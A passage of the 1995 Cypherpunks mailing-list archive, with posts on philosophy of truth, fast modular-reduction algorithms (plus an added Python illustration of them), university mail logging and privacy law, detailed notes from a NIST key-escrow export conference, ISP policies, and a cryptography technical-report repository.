> am no solipsist, and I believe we have a much clearer view today of how
> things work than we had, say, 500 years ago. Courtesy of science and the
> core idea of falsifiability.

This is exactly the opinion of the great minds of their time as well. I suspect you are just as wrong as they were. If this isn't solipsism I don't know what is. We are no valid measurer of our ignorance. We are simply too close to see where the horizons truly are. The catch here is we will always be too close. The real issue is not whether there is an observer who can discern the truth but rather; is there a truth to discern in the first place?

> And the law stays out of confirming or refuting religious claims. If
> Preacher Bob says that praying to Baal will save one's soul, no law officer
> will step in and stop this "lie." As I like to put it, of the N different
> religions, at most _one_ of them is "true," and the other N - 1 are based
> on lies. So, if we are to "allow" religious freedom we must surely allow
> lies to be told. Q.E.D.

You are confusing 'lie' and 'opinion'. No religion is true, they are based on faith and therefore unprovable. That which is unprovable is neither truth nor lie, it simply is.

> Somewhere along the line we've adopted the new view that government needs
> to correct all incorrect thoughts, needs to protect people from "hurtful"
> ideas and speech, and needs to determine what is true and what is not true.

Who is this 'we' kimo-sabi? If this were true 'we' wouldn't even be having this discussion. As to it being a new idea, hardly.

> "evolutionary epistemology," especially the writings of William Bartley and
> Karl Popper.

Read some of them, believe they are as full of shit as all other philosophers when taken as a whole. While individual ideas that these folks have presented have quite a bit of merit, as a whole not a single philosopher has ever produced a work that has really been ground shattering. You disagree? Then explain why no philosopher has managed to overshadow all the others? {And for those Christians out there who will invariably send me mail, Christianity is not the largest religion in the world, only in the US does it hold a numerical superiority.}

The reason is quite simple and one of the main problems with philosophers and politicians. They keep making the same damn mistake, they assume that since it works for them it will work for anyone (and therefore everyone) else. This is an incorrect assumption. The real problem with philosophers and politicians is that at some point they start to believe their own press releases.

Consider this, if 'truth' is so hard to define or observe why is there not an equally biased discussion about 'lie'? Few people have a problem with the concept of a lie. We can argue blissfully for centuries over what truth is but if we question what a lie is we get termed pathological. What is it about human psychology that causes this?

Take care.


From rjc at clark.net Thu Sep 7 01:14:50 1995
From: rjc at clark.net (Ray Cromwell)
Date: Thu, 7 Sep 95 01:14:50 PDT
Subject: fast modular reduction
In-Reply-To: <199509070157.VAA16973@clark.net>
Message-ID: <199509070811.EAA07559@clark.net>

I wrote:
> modifications. Is there an algorithmic analysis available? I also
> I think there is a bug in your description. Let k+1 = n+1
> (e.g. the dividend is 1 more "block" than the modulus). Then
> i=n starting out, and we have

Upon a closer look, I see there's no mistake. The algorithm will never reach k=n because the loop stops at n+1.

Anyway, I played around with the algorithm a little, and it's neat and easy to implement, but the speed increase is not worth the patent hassle (assuming there is a speed increase, I saw none). The algorithm is still basically O(n^2) if used in a modexp routine. It requires n^2 multiplications and additions. Whereas, a typical Karatsuba multiplication using a high precision reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8 additions. (for n=64 which is a 2048-bit number being reduced, it's about 1/5 the multiplications, but 5 times the additions)

Two other possible algorithms are:

Let P(x) = sum(i=0 to n-1) a_i x^i be a multiprecision integer radix x. If m is a modulus, of length n/2, rewrite P(x) as

    sum(i=0 to n/2-1) a_i x^i  +  x^(n/2) sum(i=0 to n/2-1) a_{n/2 + i} x^i

break the summation into two parts. Focus on the second term. (both terms are not equal, or one digit larger than the modulus) Perform modular reduction of the right hand polynomial using Horner's method

    x*(x*(x*...(x*a_i + a_{i-1} mod m) mod m) mod m)

Those internal mod m's can be done quickly with a 2-digit trial quotient estimation. It's still O(n^2), but might be quicker.

Still another technique.. Rewrite P(x)

    (a_0 + a_2 x^2 + a_4 x^4 + ...) + x (a_1 + a_3 x^2 + a_5 x^4 + ...)

[broken into two polys with odd and even terms] Factor x^2 out of each piece and write

    a_0 + ((a_2 + a_4 x^2 + a_6 x^4 + ...)*x^2) + x*(a_1 + x^2*(a_3 + a_5 x^2 + a_7 x^4 + ...))

Now keep applying the recursive rule until the length of the poly pieces are the same or smaller than the modulus. Now, start evaluating from the inner layers. Multiply each piece by x^2 (two shifts), and take the mod. Sum the results, shifting one side by 1 (for the x factor). Shifts are free because an array representation yields a shift with a pointer movement. It looks kinda like the method for evaluating FFTs a little bit, but it's not. Just something off the top of my head just now. (I hereby place it in the public domain assuming it's worth anything, no patents please)

I think with a clever implementation, you can trade some mults for more adds, but still use less additions than russian peasant.
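As an added illustration of the two reduction ideas sketched in Ray's post above (this is not his code, nor from any library), here is a Python version of the per-step Horner reduction and of the odd/even polynomial split, both checked against a plain `%`; the radix x = 2^16 and the sample dividend and modulus are assumptions chosen for the demo.

```python
# Added example, not code from the post: the per-step Horner reduction and the
# odd/even split of P(x) = E(x^2) + x*O(x^2), written so they can be compared
# with Python's built-in % on a constructed input.  Numbers are little-endian
# lists of base-x digits with P(x) = sum(a_i * x^i); x = 2^16 is an assumed radix.

RADIX_BITS = 16
X = 1 << RADIX_BITS


def to_digits(n, x=X):
    """Little-endian base-x digits of n, so that n == sum(a_i * x**i)."""
    digits = []
    while n:
        n, a = divmod(n, x)
        digits.append(a)
    return digits or [0]


def from_digits(digits, x=X):
    """Inverse of to_digits (plain Horner evaluation, no reduction)."""
    value = 0
    for a in reversed(digits):
        value = value * x + a
    return value


def horner_mod(digits, m, x=X):
    """Horner's method with a reduction after every step, as in the post:
        x*(x*(...(x*a_{n-1} + a_{n-2}) mod m ...) + a_0) mod m
    Because r < m before each step, r*x + a < m*x, so each quotient is at
    most one digit wide; a multiprecision library would replace the % here
    with the post's 2-digit trial-quotient estimate.
    """
    r = 0
    for a in reversed(digits):
        r = (r * x + a) % m
    return r


def split_mod(digits, m, x=X):
    """Odd/even split from the post: P(x) = E(x^2) + x * O(x^2), applied
    recursively until every piece is a single digit, then summed back up mod m.
    The power of the radix is itself reduced mod m at each level, so the
    multipliers never grow beyond the size of m.
    """
    def rec(ds, xk):            # evaluates sum(ds[i] * xk^i) mod m
        if len(ds) == 1:
            return ds[0] % m
        even, odd = ds[0::2], ds[1::2]
        xk2 = (xk * xk) % m     # radix for the next level is x^2 (mod m)
        return (rec(even, xk2) + xk * rec(odd, xk2)) % m
    return rec(digits, x % m)


def demo():
    """Reduce a constructed 192-bit dividend modulo a constructed ~60-bit
    modulus both ways and return (horner, split, reference)."""
    a = 0x0123456789ABCDEF0011223344556677FEDCBA9876543210  # constructed value
    m = 0x0FEDCBA987654321                                   # constructed modulus
    digits = to_digits(a)
    return horner_mod(digits, m), split_mod(digits, m), a % m


if __name__ == "__main__":
    h, s, ref = demo()
    print("horner:", hex(h))
    print("split: ", hex(s))
    print("agree with %:", h == s == ref)
```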
-Ray From Saitmacher at MSMDSTTF.frankfurt.hoechst-ag.d400.de Thu Sep 7 01:26:57 1995 From: Saitmacher at MSMDSTTF.frankfurt.hoechst-ag.d400.de (Saitmacher, Klaus, Dr., DyStar) Date: Thu, 7 Sep 95 01:26:57 PDT Subject: subscripe Message-ID: <000C8D27.MAI*/S=Saitmacher/OU=MSMDSTTF/O=FRANKFURT/PRMD=hoechst-ag/ADMD=dbp/C=de/@MHS> subscripe From greg at ideath.goldenbear.com Thu Sep 7 01:31:22 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 7 Sep 95 01:31:22 PDT Subject: University logging mail to anon.penet Message-ID: <199509070815.AA00296@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Jeff Simmons writes: > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. With respect to logging of student traffic, I'd look at the Family Education Rights Privacy Act ("Buckley Amendment", 20 USC 1232g) and the California analog to it (assuming one exists; Oregon's is located at OAR 571-20-005, et seq.). The release of information about individual students beyond "directory information" (e.g., name, dates of attendance, degrees granted, etc) is sharply limited without the consent of the student. Information about mail traffic sent and received is, IMHO, arguably (but not clearly) within "educational records" for FERPA purposes. To establish a Buckley Amendment violation (and I'm not saying there was one here) you'll still need to find a University employee to pin the disclosure on. If it's a University employee who posted them to the newsgroup, it's easy. If the University employee merely maintained those records in a place where an outsider was able to easily gain access to them, it seems like a bigger stretch. 
I had occasion to talk with a relatively high-level administrator in the University of Oregon's computer center some time ago and he explained that they've had to go to some trouble to make sure that gopher/WWW directories and other contemporary university computing practices don't fall afoul of the Buckley Amendment. Perhaps the powers that be at other places aren't quite so forward-thinking (or don't have the questionable benefit of being next door to a building full of law students with time on their hands). Perhaps an even longer stretch would be an argument that the practice of logging (and of keeping those logs in an insecure place) violates students (and others') right to privacy. Federal protection for a "right of privacy" is fickle, but California protects its citizens' right to privacy in its constitution. (I'm not an attorney (yet), don't live in California (right now) and consequently don't know much about CA law. So please think about this message as maybe a hint in (I hope) a useful direction, not necessarily the right answer. Feh.) This concrete issue seems like a good reminder of the implications of the way that we think about "cyberspace" and the things that happen when we use computers. If one thinks about a machine or a network as "public space", logging or reporting activities which happen there (e.g., Alice walks over to visit Bob, leaving footprints everyone can see in /var/adm/syslog) seems reasonable or at least not offensive, and it seems silly to talk about being angry because someone wrote down what everyone could see. But if we think about machines and networks as being private space, reporting on what Alice and Bob do seems tacky and rude at best, and horrifying (and likely to create liability) at the other end of the spectrum. As much as I dislike the "cyberspace" metaphor, its use or misuse has serious consequences. 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBME6qJH3YhjZY3fMNAQHiQgP9HjqkwOzMabzXXbUKp0W7c2MAn4na5X1X UPVY8p70abNVpPoVFGQTUpgBnv3hBy40n5RFD9pNM7c2UPwq0C8Tcir9TBr+xEH7 L7iQCjsqIK5F1lv66C5yMFu8wfiRF10hMhTJYthOa04dyP10HovT2QameGw+DZHJ og1t7owgcco= =D5PV -----END PGP SIGNATURE----- From perry at piermont.com Thu Sep 7 01:37:22 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 7 Sep 95 01:37:22 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509070639.BAA00416@mail.socketis.net> Message-ID: <199509070834.EAA04213@frankenstein.piermont.com> Was this really needed? Gary Jeffers writes: > ON OFF-TOPIC > > THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! From frissell at panix.com Thu Sep 7 02:49:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 02:49:55 PDT Subject: Collection of personal info In-Reply-To: <199509062144.RAA05718@cushing.bwh.harvard.edu> Message-ID: On Wed, 6 Sep 1995, Adam Shostack wrote: > No. But the interesting question is, what to do about it? > The answer in part, is personal anonymity through cash and avoiding US > IDs. But in the long run, thats broken. You can't have privacy for > 1000 people; they'll just toss us all in jail. I doubt if TRW will throw you in jail for avoiding their database. Last time I looked, it wasn't (very) illegal to avoid US IDs. DCF From frissell at panix.com Thu Sep 7 03:05:41 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 03:05:41 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509062335.SAA02364@sam.neosoft.com> Message-ID: On Wed, 6 Sep 1995, Buford Terrell wrote: > How could crypto put lawyers out of business? People would still > have disagreements; plans would still go wrong; cars would still > crash. More important, transactions would still need to be > structured to carry out the desires of the parties while minimizing > risks. 
> > Good communications technology, including crypto, could make lawyering > more efficient, but I suspect the savings would be minimal. Well, if crypto reduces the role of government in human affairs, it will reduce work for lawyers. Telecoms will certainly break the professional monopoly of lawyers (and other professionals). DCF From futplex at pseudonym.com Thu Sep 7 03:27:43 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 7 Sep 95 03:27:43 PDT Subject: not a flame please read and think about this In-Reply-To: <9509070626.AA07408@anon.penet.fi> Message-ID: <9509071027.AA15077@cs.umass.edu> I feel it's my civic duty to respond to these things, but there's nothing new here. NOISE. an116512 at anon.penet.fi writes: > why is it that half the > people who post here work for the government or big companies that are doing > government's bidding *sigh* This line gets trotted out every few months here, like clockwork. You should look for similar threads in the archives. Allow me to sum them up for you, meanwhile: who cares ? Perhaps it's because the government and big corporations have (surprise) flocks of people working for them. Your assertion that fully 50% of the posters to the list overtly work for such organizations is patently absurd, anyway. [...] > what makes me wonder isn't so much that they're here but that they post > so-called reasonable stuff that supports the government line. > like when these people report on what the nsa guy says at the crypto > convention as if we're supposed to take it seriously What alternative do you propose ? Are we merely to chuckle and say, "Oh, those guys at the NSA are such kidders. As if they actually had any influence on public policy decisions in the U.S. What a hoot !" ? > and these people who say clipper is good enough no back doors. > and then everyone takes this crap seriously. Eh ? David Sternlight isn't openly on the list; whom do you have in mind ? 
> obviously the government thinks there are some things we shouldn't think > about ourselves. (Agreed) > and then someone comes along and says they've thought about > it already and we should just go mind our own biz. aren't we supposed to be > cypherPUNKS? then why do we need these people to think for us? Unless you can be more specific about this, I really have no idea to what and whom it refers. > honest replies only please. I don't mean to flame but this really bothers me. BTW, if not for this line I wouldn't even have bothered replying. > we should maybe think about a closed list. Feel free -- no-one is stopping you or anyone else from creating one. You could even announce it here. I'll still be here listening to Matt Blaze, Jim Gillogly, Derek Atkins, Jeff Weinstein, et al. But then again I've worked at a govt. lab too, so I guess I wouldn't be welcome on your list either. Darn. -Futplex From pfarrell at netcom.com Thu Sep 7 04:26:42 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Sep 95 04:26:42 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <26714.pfarrell@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Here are my notes and remembered impressions from Wednesday's NIS&T conference on key escrow (aka GAK) export. Please note that there is a separate conference next week on creating a FIPS PUB standard for key escrow. That standard will be promulgated, just as GOSIP, POSIX and Clipper/Skipjack were promulgated. This export conference was separate from that FIPS standardization process. I got stuck in a construction traffic jam, and missed the introductory speeches. Perhaps one of the other c'punks can fill us all in on what I missed. The first item is that the export criteria will be changed. A small number of bits will be added to unescrowed crypto, and 64-bit escrow'd (GAK'd) systems will be allowed. They don't care which algorithm is used, DES, RC4, blowfish, etc. They care about key length. 
If it is short enough, it is exportable. The conference seemed to be an attempt to co-opt industry into agreeing that 64-bit GAK is much better than the current situation. After all, it would be too strong for a "hacker in France" to break it. When they opened the floor, there were a few comments/questions that indicated that not everyone was convinced that this was a good thing. I pointed out some graduate students don't consider "hacker" a compliment, and that I thought Damian did a great job breaking RC4-40. I also pointed out that it was broken again in 31 hours with a "bunch of commercial systems, Sun and Pentiums" with no need for supercomputers. I then asked if the criteria were fixed, as setting criteria controls the result. The NIS&T approved board said that changes to the criteria were part of why the conference was being held. The next hour and a half was presentations from "industry." Essentially comments on the proposal. Nearly all of the spokesmen said that the criteria were flawed. Some said that they already had commercial products that met most of the real needs of the industry (key recovery) but they didn't meet the NIS&T/NSA "criteria." Probably the strongest was the condemnation by Robert Holleyman of the Business Software Alliance. Holleyman said that BSA represents firms such as Microsoft, Novell, Lotus, Sybase, SCO, Autodesk, and Intergraph. He said that current policy "directly threatens" the industry because of "The US Government's continuing refusal to adopt realistic export control policies." He went on and on. It was clear that his position is that the proposed policy is a mistake. After the presentations, there were more questions. I proposed one additional criterion (based on email that I received from the c'punks): How do we expire court approved access to encrypted data, so that once the court orders are over, the LEAs no longer have the ability to decrypt. 
The answer was that with clipper, special hardware is needed, and it goes away when the court order does. I asked how that model worked in a software only world. There were mumbled statements about adding it as a criterion. The conference then broke for lunch and breakout groups. The one I was in discussed criteria 5 and 6 of Topic 3, published in my URL http://www.isse.gmu.edu/~pfarrell/nistmeeting.html They are short enough to reproduce here.

5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block).

6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled.

After I commented that the person writing the notes has the ability to determine what was said, the folks from NSA and NIS&T asked me to take the notes. I love it; but I did try to be objective. In the middle of this discussion, a government-generated, but anonymous paper was distributed. It had "Example Suggested Solutions." It suggested that source code not be available for products suitable for export. It also suggested other ideas, such as storing a checksum/hash and having the system "check the cryptographic code several times during its use." There was a strong reaction against these suggestions, not because they were bad ideas, but because the paper was delivered with no prior publication. This precluded any planned response to its ideas. We reworded #5 to say "want to Trust the Product." This means that it is untampered, works as expected, etc. We then hashed out ways to know this. The list ended up looking like:

1. is available only as object code
2. contains some "hash" function to check for modifications
3. contains some unique hash, with uniqueness based upon something like "site," "per copy" or "per release"
4. Contains policies against modification, such as license language against decompilation.
5. OS-related security, such as runs "protected mode" instead of as a wild DOS program.

Of course, the software vendors went wild against "per copy" identifiers, saying it would add two orders of magnitude worth of problems to manufacturing. The items on the list were not "must have all of these"; rather it was a pick-and-choose menu. We also required that the standard allow for technical innovation to keep up with the evolving state of the art. The discussion of #6 was more lively. We took a long time figuring out what it said. For instance, could ViaCrypt sell a product that was compatible with PGP 2.6.2 (non-escrowed) that also worked with the new escrowed ciphers? It seems to me, and a lot of other folks there, that such a product would be non-exportable. We simplified the criteria to: "right products won't talk to wrong products." with "right products" meaning those that are exportable, and wrong products being those that aren't, or are hacked, or ... We then developed "goals" including:

1. One version for sale worldwide
2. Allow development in the US
3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-)
4. Must interoperate with everything
5. Receiver can only decrypt if escrow agencies can decrypt.

This leads to a bunch of issues and observations, including:

a. Can goals 1, 2, and 4 be met simultaneously? There was a suggestion of a "friendly man-in-the-middle" who would receive a GAK'd conversation, and strip off the GAK parts, and reencrypt it, and retransmit it to a non-GAK user. Which leads to:
b. Can we prohibit a friendly MITM?
The big issue was:
c. Startup compatibility. No one will buy products unless they have sales attractiveness. This means compatibility with existing systems. 
Yet the criterion #6 seems to say that approved products must refuse backwards compatibility. This was labeled a "non starter" by the group. The consensus was that companies can develop a substantial competitive advantage by developing off-shore and offering both escrowed encryption and compatibility with existing systems. There was a discussion of grandfathering in some technologies. This was to help interoperability. The conversation became fuzzy. Grandfathered technologies included DES, 3-DES, IDEA, and long key RC4. One key idea was that it may make sense to allow software that encrypts with escrowed keys, but can also decrypt with any algorithm. This allows the LEAs to access outgoing messages, while allowing interoperability. The discussions frequently wandered to discuss the language of the criteria. The wording was considered simultaneously too subjective and impractical. For example, we considered the phrase "tamper resistant" to be preferable to the original "prevent tampering," because it is impossible to absolutely prevent modification to software. The issue of interoperability was raised repeatedly. It is critical that exportable products interoperate with other, existing export products. The last issue in the session was that the length of the key, 64-bits, was defined in criterion #1. There was no discussion at the conference on this criterion. It seems that the NIS&T and NSA folks believe that this is a closed topic. The folks in the session did not agree. They felt that 64-bits was not enough. Once the breakout session was over, the entire conference met together, and the "reporter" from each session reported their comments and findings. All breakout sessions had suggested changes. The group that discussed criterion #9 recommended removing it. 
The group that discussed criterion #2 (no multiple encryption) reported that industry was working on a general solution to the problem of key recovery, and that their solution would probably appear as quickly without the government's "help." Several groups identified that there are at least two separate problem domains: communications and data storage. Communications typically is short term, and has unique keys for each session. Data storage has far fewer keys that are used for long periods. Several speakers suggested that while communications keys were not suited to be escrowed, there was a large need for key recovery for data storage. There was no response from the government representatives to any of these points. One government speaker did say that there would be a Federal key escrow standard, period. After the combined session, there were more break-out sessions. In the one that I attended, the folks from National Semiconductor described their CAKE system. This is a smartcard/PCMCIA device that uses 2000+ bit public/private key encryption and signatures. They are hoping for export approval; it is necessary for the project to be viable. The system looks pretty interesting, but it is too complicated to describe here. In short, random session keys are generated and signed with a Data Recovery Center's public key. The LEAs could then send encrypted session keys to the DRC, which would decrypt them, and return the unencrypted session keys which the LEA could then use to decrypt the messages. While this is a hardware system, its concepts could be transferred to a software implementation. One obvious problem is that NS' system doesn't meet criterion #8 (requiring repeated involvement of the escrow agent), since it may require hundreds or thousands of session key decipherments. It also has a number of attractive features, such as never sending the private key anywhere, only the session key is escrowed. 
The general discussion showed concerns that in the international community, requiring government escrow may cause loss of valuable data, as some foreign governments are not as trustworthy as the US. It was the consensus that requiring users to have 50 or more escrow centers was unworkable. Yet this could be required for large multinational companies working in 50 or more countries, if each required a local key escrow service. The NS model would allow both date stamping of session keys, and periodic rekeying. Either would satisfy my "unaccepted" Criteria #11, technical limits to the time that a court ordered decryption could be executed. There was a discussion of changing the criteria so that only the transmission of data was concerned with escrow. This would simplify the issue of multinational escrow. We did not resolve whether this would be sufficient or acceptable. Today, we will talk about suitable escrow agencies. Pat -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBME7WOLCsmOInW9opAQHbawP+PSC+9p7ll7yKTiwnkzrIf+aT/ZfuoCqj Fp6ZhykIoJQVF5YAEhz9O1t9FKOauo3baMDhaIvU4pUSm2b/hKlUFB8cwYr7KTjd MFGxTOG/D7blGuX6ZXbHlS5EkKeT1pDtfrd9GlnTKWHxfga/51ROWCG/33BWZxHR lyNLI07UPbo= =kFkC -----END PGP SIGNATURE----- Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From stripes at va.pubnix.com Thu Sep 7 05:58:29 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Thu, 7 Sep 95 05:58:29 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) In-Reply-To: <199509070542.BAA23214@libws4.ic.sunysb.edu> Message-ID: In message <199509070542.BAA23214 at libws4.ic.sunysb.edu>, Deranged Mutant writes [...] 
>I've heard some nasty stories about boards and a couple of I-Net providers >who charge for access but reserve the right to throw someone off the system >without refund (it's often in the terms of many account applications) for >various no-nos. A lot do more or less that, but if you were an Internet Service Provider how would you deal with it? For example what if a customer started sending obscene material to people who didn't want it, and the recipients started to complain to you, or the government? If you (the ISP) don't have a service agreement that says you can disconnect the customer in that case you are in danger of getting sued by them if you cut them off. If you don't cut them off you are in danger of getting sued or shut down by the government. Even if we were in a more libertarian society you run the risk of being boycotted by potential customers (of course the analogy breaks down somewhat, in a very libertarian society you might be able to run a profitable ISP selling to the very niche market of people who want to threaten, harass, or generally make a nuisance of themselves). As a result you are unlikely to find an ISP that doesn't have a set of no-no's. (and if you do they may not be in business for long) The best I think you can do is find an ISP that publishes their list of no-no's (like the one I work for UUNET - see any file in ftp://ftp.uu.net/uunet-info with "svc" in its name and skip down to "AlterNet Terms and Conditions"), and seems to have a reasonable set of them, and last but not least make sure that they do at least refund any payment for service not received. For example UUNET (which I work for - but this is mostly irrelevant as this is a statement of the facts, not an opinion) publishes their terms and conditions in ftp://ftp.uu.net/uunet-info (look at any file with "svc" in its name and skip down to "AlterNet Terms and Conditions"). As for reasonability I'll leave that up to you to decide. 
-- And no, I'm not speaking for UUNET Technologies, or anyone but myself. From stripes at va.pubnix.com Thu Sep 7 06:16:30 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Thu, 7 Sep 95 06:16:30 PDT Subject: Are booby-trapped computers legal? In-Reply-To: <9509061938.AA02249@zorch.w3.org> Message-ID: In message <9509061938.AA02249 at zorch.w3.org>, hallam at w3.org writes: [...] >People who go round drawing parallels to gun ownership and cryptography >ownership are simply playing into the government's hands. That could well be. (that's as crypto relevant as this message gets - sorry) > Cryptography has net >benefits to society. Most advocates of gun ownership tend to convince me of >little more than they are a danger to society. Regardless of their case they are >the biggest argument for gun control, and therefore poor advocates of their >cause. [...] I'm sorry to see you say that, but rather than argue here I'll provide a pointer to a fine set of arguments "A Nation of Cowards" by Jeffrey R. Snyder (the "nation" it refers to is the USA, not the UK). Available via the web , enjoy or not. From derek at hagling.demon.co.uk Thu Sep 7 06:52:32 1995 From: derek at hagling.demon.co.uk (Derek Roth-Biester) Date: Thu, 7 Sep 95 06:52:32 PDT Subject: Cybersecurity Message-ID: <199509071329.JAA06512@panix.com> > >> "Cybersecurity" - an investigation into cryptography, the > >> Internet, civil rights, Phil Zimmermann, PGP (and should we be > >> permitted to use it?) and so forth. > >> [My wife] and I watched this program - she found it very informative - otherwise for me it wasn't anything new, other than to see Whitfield Diffie, Phil Zimmermann and some porn star Cyberella being interviewed about public/private key encryption. 
It was very much on the side of those seeking privacy, presenting the government (even in the UK they are looking at mandatory key escrow, but they haven't exactly told British subjects about it) as being underhand, sneaking around to find ways of removing the privacy of the individual. What they didn't say is that the debate is a moot point. The technology is out there and there ain't nothin' the guvmint can do about it. Derek From jamesd at echeque.com Thu Sep 7 06:57:16 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Sep 95 06:57:16 PDT Subject: What is truth? Message-ID: <199509071356.GAA01805@blob.best.net> Crypto relevance: Absolutely none: At 10:57 PM 9/6/95 -0700, Timothy C. May wrote: > If you want more information on my views about truth, check out > the work on "evolutionary epistemology," especially the writings > of William Bartley and Karl Popper. Popper went off the deep end because he tried to justify science without relying on the principle of induction, or its equivalent, Bayesian probability. A hopeless endeavor, like the attempt of the behaviorists to describe behavior without reference to intention, desire, and knowledge. His reasoning leads logically to the polylogism of the fascists, an outcome he imagines he avoided, but in fact he merely rephrased in language that superficially sounds more favorable to science. Bayesian probability leads us to the conclusion that some scientific theories have a probability of truth that is exponentially close to unity. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. 
| jamesd at echeque.com From jim at acm.org Thu Sep 7 07:06:42 1995 From: jim at acm.org (Jim Gillogly) Date: Thu, 7 Sep 95 07:06:42 PDT Subject: not a flame please read and think about this In-Reply-To: <9509070626.AA07408@anon.penet.fi> Message-ID: <199509071406.HAA07763@mycroft.rand.org> > an116512 at anon.penet.fi writes: > like when these people report on > what the nsa guy says at the crypto convention as if we're supposed to take it ... > honest replies only please. I don't mean to flame but this really bothers me. >we should maybe think about a closed list. Time to mark my calendar -- flamed on the same day by David Sternlight in alt.security.pgp for espousing cypherpunk ideals and by an anonymous person on C'punks for being a government stooge. I must be doing something right. 16 Halimath -- red letter day. Jim Gillogly Highday, 16 Halimath S.R. 1995, 14:05 From jamesd at echeque.com Thu Sep 7 07:36:21 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Sep 95 07:36:21 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: <199509071435.HAA04352@blob.best.net> At 12:29 PM 9/6/95 -0700, Timothy C. May wrote: > I've seen figures on the "linear feet" of regulations, and how they are > growing exponentially, but I don't recall the numbers. Something like the > total number of laws doubling every 10 years or so, but don't quote me on > this one. In addition one should also consider that most of these new crimes are deliberately written to be sweeping and vague so that they can be enforced in a selective and capricious manner: For example wetlands are deliberately defined in a way to give them considerable elbow room, indeed so much elbow room that much of Death Valley technically qualifies as wetlands. The wetlands law was written to make it easy for bureaucrats to win lawsuits, not to reflect common sense or basic sanity. 
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From bianco at itribe.net Thu Sep 7 07:46:24 1995 From: bianco at itribe.net (David J. Bianco) Date: Thu, 7 Sep 95 07:46:24 PDT Subject: Cryptography Technical Report Server (CTRS) needs submissions! Message-ID: <199509071442.KAA03274@gatekeeper.itribe.net> Earlier this week I posted a note bemoaning the lack of a good searchable repository for cryptography related technical reports. In short, I volunteered to develop, host and maintain such a system as a service to the rest of the Internet. The system is ready, now the fun part begins... The Cryptographic Technical Report Service needs *YOU*. Specifically, it needs your technical reports (or other technical documentation). In order for CTRS to become popular, it needs to have a useful amount of data to search, so I'm currently soliciting submissions for the database. Contributing to CTRS is pretty simple. Detailed information can be found at , but basically all that's required is to send a refer-format bibliographic entry which contains a URL pointing to the paper's real Net location. I'll index the entries (prettyprinting them, of course), and CTRS users will follow that URL if they want to retrieve the paper. If you don't have a URL, I'm willing to host as many papers as I have resources for. Full details can be found at the URL above, but please note that I'm only able to accept papers submitted by the authors (or copyright holder). If you'd like to know more about CTRS, you can check out its beta version at ( for the SSL version). The database doesn't have much (anything) in it right now, so I'm relying totally on submissions in order to build the collection. 
I firmly believe that CTRS can provide a useful service to the cryptographic community, so I hope you will all consider contributing your reports to CTRS. If you have questions, please check out the CTRS FAQ . If you still have questions, feel free to contact me at the email address below. ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From danisch at ira.uka.de Thu Sep 7 08:00:41 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 7 Sep 95 08:00:41 PDT Subject: fast modular reduction (proof?) Message-ID: <9509071459.AA01801@elysion.iaks.ira.uka.de>

> In the following pseudocode, B is the radix in which the numbers are
> represented (2^32 for a 32-bit machine), n is the length of modulus in
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1
> is the length of X, and Y is the result.
>
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

To do a proof I rewrite the algorithm:

n = len(modulus)                 // modulus < B^n
Y = X                            // obviously Y = X mod modulus
K = B ^ (n+1) - U                // U = B ^ (n+1) mod modulus,
                                 // therefore K = 0 mod modulus
                                 // furthermore K > 0
for (i=len(Y)-1 ; i>n ; i--)
{
    F = B ^ (i-n-1) * K          // F > 0
                                 // F = 0 mod modulus
    Y -= Y[i] * F                // Y shrinking, but
                                 // Y still the same mod modulus
    if ( Y >= B^i )
        Y -= F                   // again shrinking,
                                 // still the same mod modulus
}

This shows that Y was shrinking, but is still equal to X mod modulus.

To see whether Y really shrinks enough:

Y = sum(i=0..len(Y)-1) Y[i] * B^i

In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what could be done fast by reducing the length of Y). Now Y < B^i

Afterwards the same value mod modulus is added to keep Y constant:
Y = Y + Y[i] * U * B^(i-n-1).

Y[i] < B  ->  Y[i]+1 <= B
U < modulus < B^n , therefore U < B^n
-> (Y[i]+1) * U < B * B^n = B^(n+1)
